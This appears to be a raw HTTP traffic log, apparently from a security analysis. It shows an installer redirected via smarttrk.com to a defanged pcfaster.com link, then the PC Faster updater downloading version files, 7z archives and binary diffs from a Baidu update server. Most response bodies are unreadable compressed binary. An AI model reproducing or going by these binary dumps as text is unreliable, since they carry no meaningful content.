Host: smarttrk.com
User-Agent: Setup Factory 8.0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://VVV.pcfaster.com/pt/?da=1&REQUEST_ID=144327560
Server: Microsoft-IIS/7.5
Set-Cookie: .sess=r0bq4lcakt0zlb4wmlwcd1ry; path=/; HttpOnly
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 4.0.30319
Set-Cookie: sid=6cEM4D5HAWZDfGq0blYVtxhQWyaL4CuqFTz8ZQ6pAsgkw72gU6OmWg==; domain=.smarttrk.com; path=/; HttpOnly
Set-Cookie: trk=rkoTnNKHimO39sYzZRHChabikl5Ok//sPzCF7GAfHsZAl aW8EfCcw==; domain=.smarttrk.com; expires=Fri, 20-Dec-2019 15:41:47 GMT; path=/; HttpOnly
Set-Cookie: c30674=6cEM4D5HAWZYOp/zu6FfegLs4Kjf E3yuPuyRra4dpWl0x5zR1N0Vg==; domain=.smarttrk.com; expires=Mon, 19-Jan-2015 15:41:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 20 Dec 2014 15:41:46 GMT
Content-Length: 174<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://VVV.p
cfaster.com/pt/?da=1&REQUEST_ID=144327560">here</a>.</
h2>..</body></html>....
GET /5.0.7.99579/baidu_update/FileList.xml.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:44 GMT
Content-Type: application/xml
Connection: keep-alive
Content-Length: 80155
CDN-key: d66d80a8c1b2f9e8ec020e79a1812600
Accept-Ranges: bytes
Last-Modified: Thu, 04 Dec 2014 06:49:05 GMT
ETag: "4f34160-1391b-5095e5b2ffa40"
CDN-AGE: 17z..'....-...8......\.......y....w........3.a`.....f...'D.$.."8..S...5>>
..Xn....W.J. '...$.'.:!...'...._53.6.....Y.......Le..].K.m<.u.x..0.
.@......@W..};.=..Tx.y.5p._....<... ...#...../....."..c.qY...L....Z
............N...f.....r,1...%..=M.v...z.....<<$.8....`.ZFb\...,Y
.B.6^#F...r..1";..h.......r..-.O..i...zN..@.g...".....6v.KH..u.A.....-
G.n8I.IM.z.>...L...F..@C..(...U....8.7..Zf .=sf~W....{.Q.C..Ro....a
~lD.SO..."4....ih....e.......j...z,..sJkny=..D..b1ZU.....YC.4'f....;XF
UY.2S[y.i{8.S...F)g...@....'.4...?..$..,.....5.Y...t.L..X.4..!.. .!...
.f.K.......(........1....p..R..F..]..'li%..S....R.|t.. ...#.U.4lHr$...
:...i$-Z,...K).1..b...../.4.3...vCP...l.*......\3}......2.....d."p.L/.
..I..V.7..}C....j..ON......t.....S..>..[....5}H.....j=..!.m..3.Y&iG
.cXQ..:]q.wu.%.<........L...z....!.S].Z...O..$..8..s...1.&.0m....i.
=.....~..[.....#...H'.."LUc>..M...7.G..("N...i"<.....|.@{.. 7"..
&N...x.I.:.~U.7o..U..G}E.$w\t\%g.....{..bz...c...C..mLr0.5......D..1W0
].m.O..(.~...:Tg.L>..0U.L.'..A.!.A...2..^..b.e..3..g)E..O.u...s.Cs.
.S..[...";......g.,.)..RB...o.....z.....l.V.....Qh..X....{....=.?.GK.Z
.....)Ew[.Z..x=..Y3Y.4.b.t...1.2.nG.&......t....q..m....?=Z...(....0.S
...#Y?i]...(-B`......J.....`.m...e.'JQ^.....7.... 4% .d.........{.MD..
..F.c...X.a................>8...F........1.8#...:W."..A.P.z.Fq..L..
.j#....g.....(.s..{.5.eg..x..h9.o.Jy..'"....O.;.re...O. W~.k..]7:?R.-1
.Q...H..JW.....].dV.....aVVo.Z..}.z\..R..]u.k.......vT..*.wb.X.....c..
...p..8J..]...R]A9@Fgy...._?6.a....V....1.(..."..t>._....O.m(.`
GET /pcf_data/2014.12.09.115357/DataFileVer.xml HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:45 GMT
Content-Type: application/xml
Connection: keep-alive
Content-Length: 303
CDN-key: 3b3a26a5ca75a99f3dae72ac062f17e7
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:15:59 GMT
ETag: "6bd009e-12f-509e75b6515c0"
CDN-AGE: 1...<?xml version="1.0" encoding="UTF-8"?>..<VersionInfo XmlVe
rsion="1.0">.. <ProgramVersion Time="2014/12/09 11:53:57" >2
014.12.09.115357</ProgramVersion>.. <SignVersion Time="2012/
05/28 15:55:00" >2.0.1.0</SignVersion>.. <DataVersion Tim
e="2012/05/28 15:55:00" >2.0.1.0</DataVersion>..</VersionI
nfo>....
GET /pcf_data/2014.12.09.115357/DataFileList.xml.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:45 GMT
Content-Type: application/xml
Connection: keep-alive
Content-Length: 4067
CDN-key: 0ccb834ccd01a8f5b6976edb68d4010a
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:15:59 GMT
ETag: "6bd009d-fe3-509e75b6515c0"
CDN-AGE: 17z..'.....,.`.......c.......1[.b.w........3.a`.....f...'D.$.."8..S...5>>
..Xn....W.h.~...:.k.....[`fI..!;.....7..g...{K.n.F%.Rk.....\.z..9A.a..
...[.v-X.n....P$...2..|]U ...$C@.X>c...e.h..5..;Efq1.w.... I.~b....
.;>?.k.^....".i).........`...T.....WA...I....74).F.m3n.C..J!I,Ca..S
...C...!..\.<..C....a.;.........A......y..p.Q.Bl..X....3....(.S\1..
.vA.......m%>F.G...J.X...!..ll...n.-...Q.#3@z.....t......Q.b.&.H..c
A....~.........-.c....Ja<.....cHz..H.;.H/.ff...o..M.G....dw......n.
..............G..gH7R.-L&Mv {.K.&,..sQ.}..........mgqJ.......u.J..s...
'........M,,.....k......8.u.l......b.hOI..?. ...@ -;E.....b...l..cL}..
.[...li&..7....}i......|.}.4..`w...>.Ut..[A.&.?Z....f....}.T4..h.&l
t;....4.....n9..W.....t....j<......Q...D'.Vy5.......(Z.9E!u.!.1<
.26....`%..*8...2....f...............58....;....L.X.'K=.........*B...l
.u..O...:r.x..._W....'9.n'/....p......LRr... _.{........V ...'..z..H.@
.z..-(....g.(e".....3.L.%_.,$V.'...D.iN..1..R..F3.T^T.>.\...w.z. .m
.'.Z.[.=..V?..Y..r.. |4.y.D.^....3...@.y.........~Pm<..V.8.Q^.Lz.b.
.....AK...c...X...J...{8.....-.n...9............I.}Q.KY...B.......d.p.
Y.s<.....l@.......(.....$5X.{B.z.T?..fs[4.f........o...............
.....hN.....\..Y......V......s.y.... .A..?*o..;..x.....q..'..}.v..4...
@.1lv.-.41...&..>#.2.....>..w;Y3A.}G.~.*py_.E~....md .E^.N..p...
^.V.n...98i0.....!...ZZ$a...: P...\..*..&.eW...5..........V`....k..jl.
...n...9.O. $..].3.D..:.{.|.F%..;`]u.......[.:.....H`........!D.D.....
?XVr...O....p.....9.y.e.XJ...N..Y...[.>....>4.u.!.........|4
GET /pcf_data/2014.12.09.115357/url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:45 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 148
CDN-key: 074e5c7bc62d4d35355ebb1d1c1e8e20
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:00 GMT
ETag: "349c1d4-94-509e75b745800"
CDN-AGE: 1BSDIFF408................%......BZh91AY&SYCc.....PBt.. @.B. .!..F...,.
...#.....".(H!....BZh91AY&SY.D.....P...@... .0..).Q.Q..H........BZh9.r
E8P.........
GET /pcf_data/2014.12.09.115357/CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:46 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 79860
CDN-key: f0644c7b1e07fdf78139620eb7263c3c
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:15:59 GMT
ETag: "6bd009a-137f4-509e75b6515c0"
CDN-AGE: 1BSDIFF40........................BZh91AY&SY3 ... ......................>>
..................=]....@@]...U.>....[|.}.(RE.... ...)R.4.&.!<M4
.h.L.....=.F..0.S....I....yO..1=#M3P.C).L..z.d#.Q.I.Sji.(...6"6...=CF.
.M#@...i.OF.CA<..L.=.O#.FI.e16..F.2..Q.I....d...7.7...S14.d..~.)..`
M7.i...6 ...L....i..M4M0 .='.M4...~L...M&.D..SF.$..i....&.....4.4.z.SC
@z.jz.=@.4.P.mM..=CC...h....A...`(......Q.S......S..4d.z.j....hi......
.M...#..j....4....h..2.....`.D...&............0M.......h..0.....2`..i.
!....OS&..?BM..=.#jdh'....#4d.f...jcML....'....."2.#.z.Dz........='.L.
..M4..V..u.J6Rh..%.[`...6......*..i.S.B.gXA4.2D.r.f....)..............
14!..:.e*)d.K..je...L.N)G,T...UY...h.L..D...GEIj.&Sq2.U.J7F.Y....L...)
..a..A.L....BD"...HU(.h..R...mt :..}s..wk........a.y.s..2...Q ..&.c]..
..Z2....5hY.S....9".1...._<....-.......... .L.]|.!.7.....!. s.J}M.m
K....v!..g.G..r...]...........f.pA.t.?.rb...).s.UVv\.........N...:..@D
sY.l. ..$}. 8.,T..E2bw....PpT...K..d.".>.kJ\.....a..:.%.[...1#.l...
.48^_.|s.v ..S....$.[.......B....P.<.hnqm...z)x.A.-.P_.......4ew...
.......c.f.=....R.b....(.........t...Tr..{Qc.`...GB.....E..x.Q.."....c
.$.N-f.L.#....t....H..WT.0..{..w.....V..".J../.1!.H..#.'.Y.....Y].v.A.
.B.N.....B..y........~..v......kf.P83C.b......... .R..H.He.qB.\....{..
...j.;^[......}.R..{W...$..G"..../.t..-o]Z.3.......QD...r..i7....P@4..
D...$;....p...H..Z.lL..O.V.z6....3 .NA..@..z6x.=.E.;.Rx...D.pJ........
....i...B..&D.H`.N\........n&D.x.x.....i..x.....fY...Z..=..b..).c>.
..o.NN2.QS...*.'.x..?..BL..e.C...Ts.6.Nc..3........u.l.....7...|.Z
GET /pcf_data/2014.12.09.115357/WiFiMac.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:46 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 6146
CDN-key: c78b5ae4755d8a257b3eee76207dfe8c
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:01 GMT
ETag: "5030637-1802-509e75b839a40"
CDN-AGE: 17z..'...............Y.........%p..`...........l.Y9b....A..j......4.ra$>>
...Z.F&..a.)....I".......U...N.~......[<....1,gf......C...(!..U....
..........<9..q........a.{.hD....]n(P........o.X...6.....HD...d>
D!j.....@N.2?.l..z!.......K....5..@.=0'..b...-*C.\J.l.M.....Q&M @....{
.S..jM...z.s..Y!7..ya.V...^..H...vJ......K./V1if.f../u....7..7rS.,._..
q*......]3...y@.-....\K^...7s:D.Nc.|0.^N...H..5..}-e.y.....e....w.....
...?Sm.....D.I,-....@...h,..z......U3G..c..V....hBJAQ.`..S.6#.0!.s..q-
O..^..w6.!5k."2;.....6uM..?*^.a7 .j..H.....1..T.G.&..N-3.?..s...w.1...
........2........p.U.r.V.._..#~R.9.....K....g.T.M..~L.z.....0...k..K..
..*.....`..;..T..9(..d........t.5..t.....^d.I..s.L.7...|..dY.Gu...\U..
>.~....L.A....y..b.92.l].`..~.D?<...,G.....$mq.-.g.Z.."..d4.!Z..
ET.....%.m..I^H.:....(..;......("...................4.........v\......
..,...utIp....c.&Z.V..J...n.....i.N..wk.(vT)y.aw0.~9i97..H..:.G..HD4.s
xZ...d./:..........m_ .........i..`(f&.. .2.H.'..CN..J....Q..p..*..f..
..8(......3A.*,..&.......wS$1.].>..Se.B......z~<._!.r......2...1
.I>k.....U....)zj2..):x}...dM....g..zczn.3?.EH...Z 9?..... .._.kG..
....*w.3..Q6..w.*.<.-..4....S....l.Q$4.G...;2.Zc/..jN..t..6'RY!....
B.M}...........Y.......dF.......u...ykV;.\.. .....h.V)(Z ....?.?2..W..
9x..J....Q.8.>..3.b.9'.vK.X.....od...`...N.7.cd.. ...l...;I...@...o
..x.q?Y..kk.......^.TW.b....W....R8\...q.....x....*.....CN....vO.:.B".
ta....Jc::..a.......GpM....?..*..C.....j...1...O&..v#@....m...@(8T....
s./f.\H......j..j.....!........M".F{M#n...ZE.8...</....]ibJbx..
GET /pcf_data/2014.12.09.115357/WiFiNpc.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:47 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 2916
CDN-key: 8f9fda099c9cfd5bf98cb451d4483cc4
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:00 GMT
ETag: "6bd00ff-b64-509e75b745800"
CDN-AGE: 17z..'...............X.........~...`. .#..-.3..o.q.>.`...>......9>>
.l.V..e..n....t[Y}..[{.G[..V'...=.k0.~$1.0..!.J ....&r.......Z.8.ws..r
6.........L.Ry.... :lQ-G.....k|<j....o.[>...^.X.Q1)`........1.p.
F..[j~U.;s.3.H....Z.G....U..f...(;....TI....1.rJ.. .).s|..*..{........
.U%.:...e...;o...%..0....@z.F...V2.ph..y......=...{x 5/......8.>n.J
..a.a.*zZ..^..ZQ.dzTZ}b...u....?..6..:....n..T .....| ..%<........p
iF.a....zgd..W.k*..c.Q.NN...:.u.eg..2..N.....y........)3e.....i&.....{
.k..d.....5......KB..~."..)....dg..q.....$..@B....S.....aa..Lq. .Wj.}.
.Go*..0....q..&..#.bT.....a.yn................4..oQ.wt4.x...sa..].. ..
.B..$o......._.<].AD"r.u.;.."..'...k_l[....Bg.......B.DWY94....tp..
.Io.G....gr...wp9....-qG.A...[....2.......P$...........S.Z....G4o..!0.
<.3..9.W@..Q..6vB..6..)...W..Y..[.H.....R0&...3.7~..H.C.../R.A3...M
z.2.k...R%.......L..8T<.-......8.F.$.I...L..{.,..n.......O4m..~k7..
.... ..Q.9.{2....l....UeV....*.5...h&.:(.....i....^~J...{j.$.l...z9.W.
...VFw...M.xmOZMq.ij....hoH^.M._v...]wW...F............{.. ..b`V..r..W
l..Jc^.......t......-.7..9.r..k...aE..........u.!7~...w.....O.%...>
!.C..9.".........o.u..L8.9.M.s..8.J..jo.&A..C..4.v.....M-}....D1B..o.[
..\..A|.h.g..EL......g.5....'..P.`/.Wnl..A>......~.6.E.Y..7l......;
...!..%.M.....U).. #..p..G3..~...^.#".".... ...... ../.^U.b&.L....hR.C
/.*y..#...P.].cP..Y..*.@.qt.V.-8EfH..2.|.{.DL...N...i..V,I.Q..0.d....\
A.........,..g.1..l.J.....d.GG...S...R.a..'.v..r..C1..6f..E.....D9G...
t.8_...v.m....f..G.\..6.M.....-.J..R......&3c.R.....i....$.[......
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.LeakRepair/LeakDB-x86-1033.dat HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:43:47 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1217487
CDN-key: 20ae0150fd9fb4f0033ab2b48a9ca401
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:01 GMT
ETag: "5030602-1293cf-509e75b839a40"
CDN-AGE: 1]....v........3........9.u../K...7).....s.....'..v..mqI..S.....].h9.@|>>
]....%CW.6Q.....^.8.....f....C$z....B.=.)N.....G_...{%....x.g\W.}..*..
P..{0.;..........f.!..F....w.`....6@..=....o{7U.....m.8w!.c....K:....h
.AT.PJ.):..P..CM...../1.>.u.b.4E..m..g9.qv...'.u-.y.{..s.....T..d.
.^..^.<.X/.hR......t....x..L.h`>.H.._...,..~M....GT>.....Y.l.
.i .D....."...{q.C..c..mVQ.zm..i....*..Z.._'4..x....'k7.6W.Rc.....?...
3'.D8.q...=.5.03.\.........an.P.0>......TP.Q..jE.....jRdB\V~.N...F.
B'...}OI..09`.....d...}.......E#.QV..uS)...r....j.}Tm%O..`@...g.._.!m.
P>..7."*..... ..s...%TQFk.........`...."3..Tj....n....L............
.Q.Z....#si.Z.,..&..g.m!U..TW......O..j..uf6..A.M.?.H...6\|..R.....@..
...Cl....I....x-...CBK...?.Y....W..A...[@{..."D..... ./65w./>..<
.....J..K._.C...N=uZ...oZ...l...........M..HN...siXx:.{..%.p....T'....
n........D..yr...?w..IGd1[((./.f.........B_..*.._ 0G.,.d...f:Sx..)....
....u..b.........<.V..^.J.vPiD..Y....n....i.*...<.lk...Q.2...n[.
...~...7........f.y..Oo..X...#.Co....^.).09.C.[F.g..X......a....n.D..V
...l....:.S-....[J.p..'.#~....u|..d.z..=.qd.{K3...H"....Z...c...&....}
^.%..w...........^>.d..v.Z..*.X..b....n....|....N.q..|F....3..@..yx
...6.lL..xC....|.......o....(Rw....HK).........LQ.i...M.F..c`..D2.u.].
-.ud.m<......]..J7.,s....^.....K.....j.O6..@.....[......{...E......
....~4....Yo6.q..@Z.....t.@.....A...@0. .O..;.....k.OT...0@.J{t....../
.......5....kZ..U....!'.E. y./h...O...-H..!O....H*...tZ...R.. ...&6...
J.. .,.M<..n...}E.....^. ...".........v..2.bX....D....@.ED\^0.4
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.Optimizer/SysOpt/optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:01 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 155596
CDN-key: 0068670ea11b5e436d219120e6234daa
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:01 GMT
ETag: "503060a-25fcc-509e75b839a40"
CDN-AGE: 1BSDIFF40........................BZh91AY&SY...d........................>>
...............<.............p....{.....`...JH......Q@.R.%R.$.%H"HA
T($.(.T.R.RTA*.L..(.(......@.. ..P.......aha.......!.,..`,..1`...u..,[
..E.&..m.d.M.......e...m.....Z.hh..)D.*J..(.T..(.iRB.........(..)@.R..
..P....PD."h..@..L&...hh4...i1...A.&..4hd.....h.h...M4.....@..........
..L....`&@a1.....M.hd..I.'...5O....S...M.'.&I..M1....52z.).M.OP6.i.#j2
hUO.2..d...&M....`. ...L.h..bi..S...............`..<i..g...S.eOS.i.
.....6...........J.M..&..24.44...L.40.....h....L....d12........220....
.S.T.5##...4f.=M&...4..&.&.&&.a..#.h`.M.....F&LA.L..3S#..0...`.1.A&...
..@L.....xLL.di6..2i......2a0#..z...0L..L..L.?&L..<.115=4..).......
......j.J.M...N....-.c..O.....@~.U....4.1..6y.xW..1vN%.9..R...3<...
.)...mY..2..Sw. .I.....^v.&l.V..t k.v............@..lz....;.&..7......
...v.h.z..r...t.G0.....&....M......@F.c...{..../....xEsi.....=....&...
#.`.v\9......o.g...uS...;.#@c......Y...;..'.5~...TI...Ph7-;yPt.....9..
<.*.n.#....B.....^....JK..!Y.%..............=.....J.%].........Q...
.u"[:EC..|..%.E...A.....{g..7(.."..!.S...w.,...Go..xG=.V.U...H<Dp.H
8.$s.9....uQ.Zs........v.aB.h..r..<.6.o.........,...x....v.@#.... [
.Gi....^..:QK4X.8.-.......N&@..Y..J\.;.v.wq..0..'D.*$..l...=j.a..w.Pm.
#....3..S..q........mB..I........o.f.....fP..]OO)..Q.sd...r.\tCh..8...
.>W.9..b...nX...Ur...e..a.#0.V.(...y\.x...3..kk../G.\..Df.......WP\
&.....w]&..w...Ty..e..omc......|'x./N....w..B."u.?.,`.zw..z...1......o
.l.e.:ET...'n9..5...=.-..."....#..82....e.U.Z.K...Pu.......5t.Z...
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/AudioList.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:02 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1053
CDN-key: e9b2b25154a799ac680428244f1c8150
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:00 GMT
ETag: "34c4012-41d-509e75b745800"
CDN-AGE: 17z..'...............\........iTb.).E.`...&d..&.1...!..m....rx.7.......
.G...#f.wTz..x#.b,...F..yEe..."!.p.%.A.t.U.[k.........~.B ..../c.i5...
f..#\..........(...........MD..b..!.....*7...Ww_..%.M...|..(..<q$\.
....s.......E..F.$.j..Q#(.-....9...$.f...Y".....g..=..3...d*.....H....
>-\..i|.uE%k.HT....x...Bq.TB..b..J')]=;"...[.|>.mr..-1.F.o_!....
G..yTH..7....x..e.Y....9....l...2....9g_..P.%...Z..........V...p=ObCBm
..`d.]. ..K.....m,......9!.N.9..sfON....!a. .....=>.T/...U...7.znL.
.0x...:.e.#.m9...[..\..f....s.>.g...N=mz...jOR...s.1....\D...m.`8.X
P.7).w....!...4..o.w..OvY....$..`...3...#......Ln....Qr..._.?..u.`....
.....A.....hPs...j1..A..K.U.a...#w,...:.d....$.......'..,..^v.O.......
C..1.....N/x.o3G..@.c..,..A../.wmC2n....ET;.....t(.......(...W~../Ky..
..[.-.H....K.y........X.......z_...-..-#{U.M{..$%....x...&Yu. D.(...@.
..hP......5c..............6..^^60D....(<G.QO!Y....}...b..J......2.;
.F.H....*d.#.^...k9...m>^...o...)4......).f.mIH<.V../U7.K.e.....
..6&...............#....]............aE........A.u.d.i.o.L.i.s.t...d.a
.t........6.......... .........
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/BrowserList.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:03 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1247
CDN-key: 7eb12919f6e97f52071aa90666fa2228
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:01 GMT
ETag: "503062a-4df-509e75b839a40"
CDN-AGE: 17z..'....4.._.......`.........,M.).E.`...&d..&.1...!..m....r|..M.^..a.>>
.;...B.'kT..enl$*.|w.EB........... ^c,9....\.u.Mq.e..p{L.;......'@.."(
......9]...daU_!......".D.....<.Sn......R.........^$...<.o......
gC.].).....4J.k...xQ..X...t....X..G ._n....p.'|T.......r.q0ma..(.X.d.j
.zP....D.......a.....M6.K......W.V.....]..../....<....<...X.d..k
...x....q......<.C..x.\...z....v..`...U..l...X0o.5...`.01!w....k.F.
....."....D...O....=.(...........L.7X.#.......w...2.L.OF.........z..!.
....C...E.p.x.]..u.l.....(.P;T)..>.x.Z......y....} ..^......p.....e
1NN1).....=..6..}1..o.mm....>...r..)...n.5....]Y.,....qd".Wer'.v...
.W?.E.U..hz..^-...&\..5b.\...i..j~>5...xa..4R..=...b...}........~.~
X .....|4&.....ov Ly8..)`....?..b...v.(...D.'(.X.t.... ....?R..1....q.
.y&.O/y....i...9....K.}`a%.rXT.4..d....}.c..{.r..W....;.jH...U....D%._
.C.....#r.z..-.._..2juv....V........i.).<..U...8...y[.*..G.....)..s
=M........:a.......Z.dM.!......PO........t.z'.||...l...k"..f..........
.. .k..T......L...:...J)......>...4.........'..p?.a.kV.......>.N
9..........i0~..vh..G.b.f...1....w.&3R...&nL....1.K3...M..._...cg._@g.
.9....Ad..wA.g.2s... ...[_....DY. .....s.K0...@..w..A..$....W..L......
._......#....]...........zp.C.....!.B.r.o.w.s.e.r.L.i.s.t...d.a.t.....
.............. .........
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/PhotoList.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:03 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1753
CDN-key: 2050fee084404f4f033c4b7f3a4f75b7
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:01 GMT
ETag: "503062c-6d9-509e75b839a40"
CDN-AGE: 17z..'....M..].......\.......6....).E.`...&d..&.1...!..m....r..3....O.L>>
f........t.?AlT"...-.....*f...jt.X..o.I..4.tw.ONaM......d.v..6.s$...S.
.....gc..f.3...Sl....]:..J....z....W.1T..4''k.......1.F.X.......-'....
..Gd..a..E.<...h.A.EN..9..........1#.. .0.DH.C....k.T.....]a..V....
.L.o...|.i.IHr&0t......\...,.G..|..g.M.....k.y,...L.......1....4.}..e.
..D.T.f5?.3.8..Y.....&...VK.....0.d.t... ..y...,..D>6..Kh......4)./
b8..-.iYX....M................l..,....*...;C.../.K6.P..i..^.W..L.o....
).F.G..x`.D....cb:.B=....2.q..z.(.4aY7fW.T.w..Y(.D5.wkN_.. P-Skg....B.
#b...X.....&......&b..%>.Vj..n.....jBy.X...Wk.|}..R.%...3...1...-K.
..:.=r.......)Er..w..z.x...{?...Q9.s...>'..........C....r....].5[..
...yf.%..`....Y)......Q#...*e.A".C..]6.VM[aQ\7 X..{|.!..#..=......69.I
L......>.4!....5As\.K.X..w>....l3....7o.......i7....5U.<.C.\3
..0u..C".....u..w.....Oe..h.D... x-....K..F|.2.T... .H.."'.w.P..*m..g^
...>...I.......a'....@.%.......fv....K......-......Z{.9..{._...U.&g
t;......).oo..,..C......!...X....Zl*gE....m.itw.G...[..j.......%..H2[.
.Yr.3...@.=t:D$....DO....E...$..L...rp.W..|..qc...~.......(.9. n...B4.
hx.8.M&i..E....}uh.d..NI.M..P;......4Ex..q..h.>..rC....Y=..,.F.4#..
JK..W-....B...w..JN....$...9s.D.......^b.S.$W....,%..o,FS./\.a.....3@.
........HS...:h..V.......7.?*..\.....hS.}4KHS.1... .1.....3c.e.d.....c
.K..$Q..I..,...?m .....R.;..{.. ..n.B...7...E..X2......5x........."..&
.g..mYz.4'C....~.R.'.......#..@SY.../.n....i..>...j?%h.......wecc.V
Z....W..PBA..$ N... .......w|f.L\.!.<...N..D.%.0,..pHhs.sX...&l
GET /pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/VideoList.dat.7z HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: updown.pcfaster.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP2/1.0.17B
Date: Sat, 20 Dec 2014 15:44:03 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 1589
CDN-key: 71e0bcac308438e2d98aa77598b46bd7
Accept-Ranges: bytes
Last-Modified: Thu, 11 Dec 2014 02:16:00 GMT
ETag: "34c4018-635-509e75b745800"
CDN-AGE: 17z..'....q..........\.......2e.B.).E.`...&d..&.1...!..m....r.pbl.j..ut>>
..z..Hj:Z*f....t.....J.9.z.M6N*9.......m.Oq........*...'x1".........*E
N.^.Kf....^...Z.K...h..w..r..N.^>..j..U...../...B..|b.M.!.i....>
b.I9..>gqx.d....N..2.dV..#5O.,.....n.p.A2.ix[_..WV..Zh.U.:...Yfp.T%
I\R............y -..6?7,#lr.Q.u.....}.].v.....:....<r=..../ ...]2Z.
.....3..*...{...r1c."......TB.....).Q.t..Uz{#.....e(ba..*.......].....
m...]......Dt...oa.o.^.$...^.4eU..z&r...v...NE.....($....F.x.L...@^...
;.....%..AF... .2.6.p=.../p5f%..d../.y...|,.D..G..r.T%....w.C.C7......
.q.o..*=4....Q..&...{...2....Jw>..1."..N%..#...........H...]...jEl.
.......(j..^...'.....t..h4.@...."JI-f..5.).....X.......6{..t..TF...7..
......H$.L...]..=3....].`.M...'4.QCYc..d/Tg2._....].T...*......Wt.....
..X..s...i....n...k.....F..L..]=.r.x..t...e#.jY..C....T.<MpH\Y.}...
.].=n.C....<".u....D.......0..\...IPvb'@h7#9.!...h.`b.6U...GX.H....
..........tz_...Z7Q...5p`Hh...C...........!d....~...X....:.B.%....{..
...D%..|.)c*.7..<........S..c..(..S.'.........[.....jp~.v:.... Bav.
